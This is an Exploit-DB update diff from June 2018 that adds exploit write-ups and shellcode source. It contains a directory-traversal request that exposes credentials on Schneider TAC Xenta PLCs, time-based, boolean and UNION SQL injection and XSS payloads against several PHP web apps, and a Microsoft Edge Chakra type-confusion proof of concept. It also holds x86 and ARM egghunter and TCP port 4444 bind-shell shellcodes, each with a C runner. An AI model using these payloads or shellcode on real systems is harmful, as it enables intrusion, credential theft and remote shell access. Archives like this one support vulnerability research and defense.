DB: 2018-06-01

9 changes to exploits/shellcodes

Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion
TAC Xenta 511/911 - Directory Traversal
New STAR 2.1 - SQL Injection / Cross-Site Scripting
PHP Dashboards NEW 5.5 - 'email' SQL Injection
CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting
Grid Pro Big Data 1.0 - SQL Injection

Linux/x86 - EggHunter + access() Shellcode (38 bytes)
Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)
Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)

exploits/hardware/webapps/44809.txt

@@ -0,0 +1,32 @@
+# Exploit Title: TAC Xenta 511 and 911 Credentials Disclosure
+# Date: 25.05.2018
+# Exploit Author: Marek Cybul
+# Vendor Homepage:
+https://download.schneider-electric.com/files?p_File_Name=TAC_Xenta_911_SDS-XENTA911.pdf
+# Version: 5.17
+
+# Schneider Electric TAC Xenta 911 and 511 PLCs
+
+Directory traversal in help manuals allows for credentials extraction
+
+Devices are not indexed by crawlers like Shodan or Censys due to
+ancient SSL configuration,
+needed to use old browser to support it (not even s_client, curl or
+ncat could connect).
+
+
+Example URI: /www/help/public/../../../sys/pswd
+
+vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
+
+HTTP/1.0 200 OK
+
+root
+super user
+/
+/
+/
+password
+0
+900
+3

exploits/php/webapps/44813.txt

@@ -0,0 +1,31 @@
+# Exploit Title: New STAR 2.1 - SQL Injection / Cross-Site Scripting
+# Dork: N/A
+# Date: 30.05.2018
+# Exploit Author: Kağan Çapar
+# Contact: kagancapar@gmail.com
+# Vendor Homepage: https://codecanyon.net/item/new-star-listen-youtube-music/7486113
+# Version: 2.1
+# Category: Webapps
+# Tested on: Kali Linux
+# Description : 'ajax.php' working in the input field contains SQL
+vulnerability. The search section also contains XSS vulnerability.
+====================================================
+
+# PoC : SQLi :
+
+Parameter: name (GET)
+
+    Type: AND/OR time-based blind
+    Demo:
+http://site.com/requests/ajax.php?newstar=login&name=admin&password=123456
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: newstar=login&name=admin' AND SLEEP(5) AND
+'ddni'='ddni&password=123456
+
+
+====================================================
+
+# PoC : XSS :
+
+  Payload(1) :
+http://site.com/play?mouse_search=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&p=1

exploits/php/webapps/44814.txt

@@ -0,0 +1,44 @@
+# Exploit Title: PHP Dashboards NEW v5.5 - 'Login' SQL Injection
+# Dork: N/A
+# Date: 31.05.2018
+# Exploit Author: Kağan Çapar
+# Contact: kagancapar@gmail.com
+# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
+
+# Version: 5.5
+# Category: Webapps
+# Tested on: Kali linux
+# Description : PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+====================================================
+
+# PoC : SQLi :
+
+
+POST /php/save/user.php?mode=lookup HTTP/1.1
+Host: site.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site.com/
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 52
+Cookie: PHPSESSID=phcubu5ohtdjnd6g1bmsncro87
+Connection: keep-alive
+email=test%40test.com&password=test123&dashboardKey=
+
+Parameter: email (POST)
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: email=test@test.com' AND SLEEP(5) AND
+'XnxG'='XnxG&password=test123&dashboardKey=
+
+
+====================================================

exploits/php/webapps/44815.txt

@@ -0,0 +1,31 @@
+# Exploit Title: CSV Import & Export v1.1.0 - SQL Injection / Cross-Site
+Scripting
+# Dork: N/A
+# Date: 30.05.2018
+# Exploit Author: Kağan Çapar
+# Contact: kagancapar@gmail.com
+# Vendor Homepage: https://codecanyon.net/item/csv-import-export/21105509
+# Version: 1.1.0
+# Category: Webapps
+# Tested on: Kali Linux
+# Description : The 'offset' and 'db' parameters in the database table
+preview query has vulnerabilities.
+====================================================
+# PoC : SQLi :
+
+Parameter: offset (GET)
+    Type: UNION query
+    Demo:
+https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30&limit=10
+    Title: Generic UNION query (NULL) - 10 columns
+    Payload: action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30
+UNION ALL SELECT
+NULL,NULL,NULL,CONCAT(0x7178707671,0x78564b6846794858636354787350514d467a4863704d7a50735068495a6f7a5552625046616d6273,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL--
+STgb&limit=10
+
+
+====================================================
+# PoC : XSS :
+
+Payload =
+https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&table=clients&order=asc&offset=30&limit=10

exploits/php/webapps/44816.txt

@@ -0,0 +1,61 @@
+# Exploit Title: Grid Pro Big Data 1.0 - 'test.php' SQL Injection
+# Dork: N/A
+# Date: 30.05.2018
+# Exploit Author: Kağan Çapar
+# Vendor Homepage: https://codecanyon.net/item/grid-pro-big-data-table-view-data-grid-with-sort-search-and-filter-for-large-mysql-tables/20395348
+
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali Linux
+# Description : The multiple parameters in the 'test.php' query contain
+SQLi vulnerabilities.
+====================================================
+# PoC : SQLi :
+
+
+POST /release/pro_grid_big_data/php/test.php HTTP/1.1
+Host: site.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site.com/release/pro_grid_big_data/index.html
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 430
+Connection: keep-alive
+page=1&on_home=5&table_name=be&params%5B0%5D%5Btype%5D=text&params%5B0%5D%5Bvalue%5D=&params%5B0%5D%5Bname%5D=Name&params%5B1%5D%5Btype%5D=text&params%5B1%5D%5Bvalue%5D=&params%5B1%5D%5Bname%5D=Surname&params%5B2%5D%5Btype%5D=num_range&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bname%5D=Age&params%5B3%5D%5Btype%5D=date&params%5B3%5D%5Bvalue%5D=&params%5B3%5D%5Bname%5D=Born_date&ordering=none
+
+
+Parameter: on_home (POST)
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 4 columns
+    Payload: page=2&on_home=5 UNION ALL SELECT
+CONCAT(CONCAT('qjbqq','vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO'),'qxbpq'),NULL,NULL,NULL--
+LEgG&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
+
+Parameter: params[0][value] (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload:
+page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%' AND
+1906=1906 AND
+'%'='&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload:
+page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%' AND
+SLEEP(5) AND
+'%'='&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
+
+Parameter: params[0][name] (POST)
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload:
+page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name)
+AND SLEEP(5) AND
+(2977=2977&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
+
+====================================================

exploits/windows/dos/44817.js

@@ -0,0 +1,59 @@
+/*
+function opt(w, arr) {
+    arr[0] = 1.1;
+    let res = w.event;
+    arr[0] = 2.3023e-320;
+    return res;
+}
+
+let arr = [1.1];
+for (let i = 0; i < 10000; i++) {
+    opt(window, arr);
+}
+
+The above code will be compiled as follows:
+000001a8`8000122b 48b8503dcfd5ff7f0000 mov rax,offset chakra!DOMFastPath<7>::EntrySimpleObjectSlotGetter (00007fff`d5cf3d50)  // w.event
+000001a8`80001235 48ffd0          call    rax
+000001a8`80001238 488b8e30bdf0ff  mov     rcx,qword ptr [rsi-0F42D0h]
+000001a8`8000123f f2480f104158    movsd   xmm0,mmword ptr [rcx+58h]
+000001a8`80001245 f2490f11442418  movsd   mmword ptr [r12+18h],xmm0  // arr[0] = 2.3023e-320;
+...
+
+As you can see, there's no "ImplicitCallFlags" check after the call to the "EntrySimpleObjectSlotGetter" method. The code was generated based on the assumption that the method has no side effects. But in fact, the method can have side effects. The method wraps the return value using the "CrossSite::MarshalVar" method which traverses up the prototype chain of the given object using the "GetPrototype" method, since the "GetPrototype" method may invoke the "getPrototypeOf" handler of a Proxy object, changing the type of the array in the handler will lead to type confusion.
+
+PoC:
+*/
+
+function opt(w, arr) {
+    arr[0] = 1.1;
+    let res = w.event;
+    arr[0] = 2.3023e-320;
+    return res;
+}
+
+function main() {
+    let f = document.body.appendChild(document.createElement('iframe'));
+    f.contentWindow;
+
+    for (let i = 0; i < 100000; i++) {
+        opt(window, [1.1]);
+    }
+
+    let set_callback = new f.contentWindow.Function('callback', `
+        window.__lookupSetter__('event').call(parent, new Proxy({}, {
+            getPrototypeOf() {
+                callback();
+                return {};
+            }
+        }));`);
+
+    let arr = [1.1];
+    set_callback(() => {
+        arr[0] = {};
+    });
+
+    opt(window, arr);
+    alert(arr);
+}
+
+main();

files_exploits.csv

@@ -5984,6 +5984,7 @@ id,file,description,date,author,type,platform,port
 44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
 44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
 44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
+44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39476,3 +39477,8 @@ id,file,description,date,author,type,platform,port
 44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
 44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
 44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
+44809,exploits/hardware/webapps/44809.txt,"TAC Xenta 511/911 - Directory Traversal",2018-05-31,"Marek Cybul",webapps,hardware,
+44813,exploits/php/webapps/44813.txt,"New STAR 2.1 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
+44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
+44815,exploits/php/webapps/44815.txt,"CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
+44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,

files_shellcodes.csv

@@ -888,3 +888,6 @@ id,file,description,date,author,type,platform
 44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
 44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
 44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
+44807,shellcodes/linux_x86/44807.c,"Linux/x86 - EggHunter + access() Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
+44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
+44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm

shellcodes/arm/44811.c

@@ -0,0 +1,97 @@
+/*
+Linux/ARM (Raspberry Pi) - Egghunter + /bin/sh Shellcode (32 bytes)
+
+------------------------------
+// If your shellcode in higer address, use following egghunter.
+pi@raspberrypi:~ $ cat egghunter-higher.s
+.section .text
+.global _start
+    _start:
+    .code 32
+    add r3, pc, #1      // switch to thumb mode
+    bx r3
+
+    .code 16
+    adr r1, startpoint  // set r1 to start point address
+    ldr r2, egg         // set r2 to egg's value
+
+    next_addr:
+    add r1, r1, #1      // increment scan address
+    ldr r3, [r1]        // set r3 to the value stored in r1's address
+    cmp r2, r3          // compare values
+    bne next_addr       // if failed to find egg, jump to next address
+
+    mov r3, pc          // switch to arm mode
+    bx r3
+
+    .code 32
+    mov pc, r1          // jump to found address
+
+egg:
+.ascii "\x50\x90\x50\x90"
+startpoint:
+
+pi@raspberrypi:~ $ 
+
+------------------------------
+// If your shellcode in lower address, use following egghunter.
+pi@raspberrypi:~ $ cat egghunter-lower.s
+.section .text
+.global _start
+    _start:
+    .code 32
+    add r3, pc, #1      // switch to thumb mode
+    bx r3
+
+    .code 16
+    adr r1, startpoint  // set r1 to start point address
+    ldr r2, egg         // set r2 to egg's value
+
+    next_addr:
+    sub r1, r1, #1      // increment scan address
+    ldr r3, [r1]        // set r3 to the value stored in r1's address
+    cmp r2, r3          // compare values
+    bne next_addr       // if failed to find egg, jump to next address
+
+    startpoint:
+    mov r3, pc          // switch to arm mode
+    bx r3
+
+    .code 32
+    mov pc, r1          // jump to found address
+
+egg:
+.ascii "\x50\x90\x50\x90"
+
+pi@raspberrypi:~ $ 
+
+------------------------------
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+// If your shellcode in higer address, use following egghunter.
+unsigned char egghunter[] = \
+"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x05\xa1\x04\x4a\x01\x31\x0b\x68\x9a\x42\xfb\xd1\x7b\x46\x18\x47\x01\xf0\xa0\xe1\x50\x90\x50\x90";
+
+unsigned char egg[] = \
+"\x50\x90\x50\x90" // egg tag
+"\x01\x30\x8f\xe2\x13\xff\x2f\xe1" // execve('/bin/sh')
+"\x49\x40\x52\x40\x01\xa0\xc2\x71"
+"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
+"\x2f\x73\x68\x41";
+
+// If your shellcode in lower address, use following egghunter.
+//unsigned char egghunter[] = \
+//"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa1\x04\x4a\x01\x39\x0b\x68\x9a\x42\xfb\xd1\x7b\x46\x18\x47\x01\xf0\xa0\xe1\x50\x90\x50\x90";
+
+void main()
+{
+    printf("Egg hunter shellcode Length:  %d\n", strlen(egghunter));
+    printf("Egg shellcode Length:  %d\n", strlen(egg));
+
+    int (*ret)() = (int(*)())egghunter;
+
+    ret();
+}

shellcodes/linux_x86/44807.c

@@ -0,0 +1,129 @@
+/*
+; Filename: egghunter.nasm
+; Author: Paolo Perego <paolo@codiceinsicuro.it>
+; Website:  https://codiceinsicuro.it
+; Blog post:  https://codiceinsicuro.it/slae/
+; Twitter:    @thesp0nge
+; SLAE-ID:    1217
+; Purpose: This is the first stage of our payload. An egg-hunter shellcode
+; looping through memory and jumping on the payload after the
+; second egg found in memory.
+
+global _start
+
+section .text
+
+_start:
+
+xor ecx, ecx
+mul ecx
+
+next_page:
+or dx, 0xfff
+
+next_addr:
+; EDX is 4096 here, that is the value of PAGE_SIZE constant
+inc edx
+
+; EBX is our memory cursor
+lea ebx, [edx+0x4]
+
+xor eax, eax
+
+; access is defined as #define __NR_acces 33 in
+; /usr/include/i386-linux-gnu/asm/unistd_32.h:
+;
+; system call prototype is:
+; int access(const char *pathname, int mode);
+
+mov al, 0x21
+int 0x80
+
+cmp al, 0xf2 ; 0xf2 is the opcode for EFAULT. If my register
+; has this value, a signal for a invalid page
+; access it has been received
+jz next_page
+
+mov eax, key
+mov edi, edx
+scasd
+
+jnz next_addr
+
+scasd
+jnz next_addr
+
+; At this point we are at the very beginning of our shellcode, after
+; the second key. We can jump to it
+jmp edi
+
+section .data
+key equ 0xdeadbeef
+
+
+; Filename: execve.nasm
+; Author: Paolo Perego <paolo@codiceinsicuro.it>
+; Website:  https://codiceinsicuro.it
+; Blog post:  https://codiceinsicuro.it/slae/
+; Twitter:    @thesp0nge
+; SLAE-ID:    1217
+; Purpose: This is the default payload for the egg hunter demo. It will
+; execute "/bin/sh" using execve() system call.
+
+global _start
+
+dd 0xdeadbeef
+dd 0xdeadbeef
+
+section .text
+
+_start:
+xor eax, eax ; init EAX to 0
+push eax ; pushing 0 to the stack to be used as NULL pointer
+; execve is defined as #define __NR_execve 11 in
+; /usr/include/i386-linux-gnu/asm/unistd_32.h:
+;
+; system call prototype is:
+        ; int execve(const char *filename, char *const argv[], char *const
+envp[]);
+
+push 0x68732f2f ; pushing //bin/sh into the stack
+push 0x6e69622f ; the init double / is for alignment purpose
+
+mov ebx, esp ; pointer to *filename
+push eax ; pushing in the stack a pointer to NULL
+mov edx, esp ; I don't care about environment here
+push eax
+mov ecx, esp ; I don't even care about passing arguments to
+; my /bin/sh
+
+mov al, 0xb ; execve = 11
+int 0x80
+
+ */
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char egg_hunter[] = \
+"\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x31\xc0\xb0\x21\xcd\x80\x3c\xf2\x74\xed\xb8\xef\xbe\xad\xde\x89\xd7\xaf\x75\xe8\xaf\x75\xe5\xff\xe7";
+
+unsigned char code[] = \
+"\xef\xbe\xad\xde\xef\xbe\xad\xde\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80";
+
+
+int main(int argc, char **argv)
+{
+printf("Shellcode Length:  %d\n", strlen(code));
+printf("Egghunter Length:  %d\n", strlen(egg_hunter));
+int (*ret)() = (int(*)())egg_hunter;
+ret();
+}
+
+
+
+-- 
+$ cd /pub
+$ more beer
+
+I pirati della sicurezza applicativa: https://codiceinsicuro.it

shellcodes/linux_x86/44808.c

@@ -0,0 +1,153 @@
+/*
+; Filename: tcp_bind_shellcode_light.nasm
+; Author:     Paolo Perego <paolo@codiceinsicuro.it>
+; Website:  https://codiceinsicuro.it
+; Twitter:    @thesp0nge
+; SLAE-ID:    1217
+; Purpose: binds on TCP port 4444 and spawn a shell on incoming
+connections.
+
+
+global _start
+
+section .text
+
+_start:
+; Creating the socket.
+;
+; int socket(int domain, int type, int protocol);
+;
+; socket() is defined as #define __NR_socket 359 on
+/usr/include/i386-linux-gnu/asm/unistd_32.h
+; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h
+; SOCK_STREAM is defined as 1 in
+/usr/include/i386-linux-gnu/bits/socket_type.h
+xor eax, eax
+mov ebx, eax
+mov ecx, eax
+mov edx, eax
+
+mov ax, 0x167 ; 359 in decimal
+mov bl, 0x2
+mov cl, 0x1
+
+int 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);
+mov ebx, eax ; storing the socket descriptor into EBX for next syscall
+
+;push eax ; save socket descriptor into the stack
+
+; Binding the socket to 0.0.0.0 address at port 4444
+;
+; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+;
+;
+; bind() is defined as #define __NR_bind 361 on
+/usr/include/i386-linux-gnu/asm/unistd_32.h
+
+xor eax, eax
+mov ax, 0x169 ; 361 in decimal
+xor ecx, ecx
+push ecx       ; pushing 32 bit INADDR_ANY
+push word 0x5c11 ; pushing PORT 4444 in network byte order
+push word 0x2   ; pushing AF_INET as sin_family
+
+mov ecx, esp ; now ECX points to the my_addr data structure
+mov dl, 0x10 ; sizeof(my_addr) = 16 bytes
+int 0x80 ; bind(sfd, (struct sockaddr *) &my_addr, sizeof(my_addr));
+
+; Listening on opened socket bound to port 4444
+;
+; int listen(int sockfd, int backlog);
+;
+; listen() is defined as #define __NR_listen 363 in
+/usr/include/i386-linux-gnu/asm/unistd_32.h
+xor ecx, ecx
+xor eax, eax
+mov ax, 0x16b ; 363 in decimal
+int 0x80 ; listen(sfd, 0);
+
+; Accepting incoming connection on listening socket
+;
+; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+;
+; accept() is not defined as syscall in
+/usr/include/i386-linux-gnu/asm/unistd_32.h.
+; Instead accept4() is defined as #define __NR_accept4 364.
+;
+; From the man page, accept4() has the followint prototype:
+; int accept4(int sockfd, struct sockaddr *addr, socklen_t *addrlen, int
+flags);
+;
+; The last integer, as from the man page, if set to 0 makes the
+; accept4() call to behave as the same as the accept()
+xor eax, eax
+mov ax, 0x16c ; 364 in decimal
+
+push ecx ; ECX is 0, pushing on the stack
+
+mov esi, ecx
+mov ecx, esp ; ECX now points to a zero bytes region from the stack.
+mov edx, esp
+
+int 0x80 ; cfd = accept4(sfd, NULL, NULL, 0);
+
+mov ebx, eax ; Saving socket descript resulting from accept4 into EBX
+
+; Duplicating descriptor 0, 1, 2 to the socket opened by client
+;
+; int dup2(int oldfd, int newfd);
+;
+; dup2 is defined as #define __NR_dup2 63 in
+/usr/include/i386-linux-gnu/asm/unistd_32.h
+
+xor ecx, ecx
+mov cl,  2
+xor eax, eax
+
+dup2:
+mov al, 0x3F ; 63 in decimal
+int 0x80 ; duplicating file descriptors in backwards order; from 2 to 0
+dec ecx
+jns dup2
+
+; Executing shell
+;
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+; execve() is defined as #define __NR_execve 11 on
+/usr/include/i386-linux-gnu/asm/unistd_32.h
+
+xor eax, eax
+push eax ; The NULL byte
+push 0x68732f2f ; "sh//". The second '\' is used to align our command into
+the stack
+push 0x6e69622f ; "nib/"
+mov ebx, esp ; EBX now points to "/bin//sh"
+xor ecx, ecx
+xor edx, edx
+mov al, 0xB ; 11 in decimal
+int 0x80
+
+ */
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+
+ "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\x31\xc0\x66\xb8\x69\x01\x31\xc9\x51\x66\x68\x15\xb3\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x31\xc9\x31\xc0\x66\xb8\x6b\x01\xcd\x80\x31\xc0\x66\xb8\x6c\x01\x51\x89\xce\x89\xe1\x89\xe2\xcd\x80\x89\xc3\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
+
+
+
+int main(int argc, char **argv)
+{
+printf("Shellcode Length:  %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}
+
+
+
+-- 
+$ cd /pub
+$ more beer
+
+I pirati della sicurezza applicativa: https://codiceinsicuro.it